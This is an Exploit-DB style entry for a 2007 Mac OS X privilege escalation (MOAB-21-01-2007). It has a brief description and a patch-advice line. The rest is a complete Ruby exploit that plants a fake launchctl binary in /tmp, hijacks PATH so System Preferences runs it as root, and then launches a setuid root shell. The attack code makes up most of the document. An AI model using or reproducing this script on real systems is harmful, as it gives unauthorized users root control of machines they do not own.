Exploit for MOAB-21-01-2007: OS X, making root shells easier each day

vendor:

by:

Kevin Finisterre and Lance M. Havok

N/A

CVSS

N/A

Privilege Escalation

CWE

Product Name:

Affected Version From:

Affected Version To:

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Mac OS X

2007

Exploit for MOAB-21-01-2007: OS X, making root shells easier each day

This exploit allows an attacker to escalate privileges on a Mac OS X system, gaining root access. It uses a shell wrapper and shell planting technique to create and execute a malicious binary file. The exploit takes advantage of a vulnerability in the System Preferences application.

Mitigation:

Apply the necessary security updates and patches released by the vendor.

Source

Exploit-DB raw data:

#!/usr/bin/ruby
# Copyright (c) 2007 Kevin Finisterre <kf_lists [at] digitalmunition.com>
#                    Lance M. Havok   <lmh [at] info-pull.com>
# All pwnage reserved.
#
# "Exploit" for MOAB-21-01-2007: OS X, making root shells easier each day.
#

SHELL_WRAP      = 'int main() { system("/bin/sh -i"); return 0; }'
SHELL_PLANT     = 'int main() { system("chown root: /tmp/shX; chmod 4755 /tmp/shX"); return 0; }'
PREFS_BINPATH   = '/Applications/System\ Preferences.app/Contents/MacOS/System\ Preferences'

COMMAND_LINE    = "echo '#{SHELL_WRAP}' > /tmp/t.c &&"    +
                  "cc -o /tmp/shX /tmp/t.c &&"            +
                  "echo '#{SHELL_PLANT}' > /tmp/t.c &&"   +
                  "cc -o /tmp/launchctl /tmp/t.c &&"      +
                  'export PATH="/tmp/:$PATH" &&'          +
                  "#{PREFS_BINPATH} &"

def escalate()
  system COMMAND_LINE
  puts "++ Click on Sharing and then click on Windows Sharing..."
  sleep 30 # make sure you have "time"
  system "/tmp/shX" 
end

escalate()

# milw0rm.com [2007-01-21]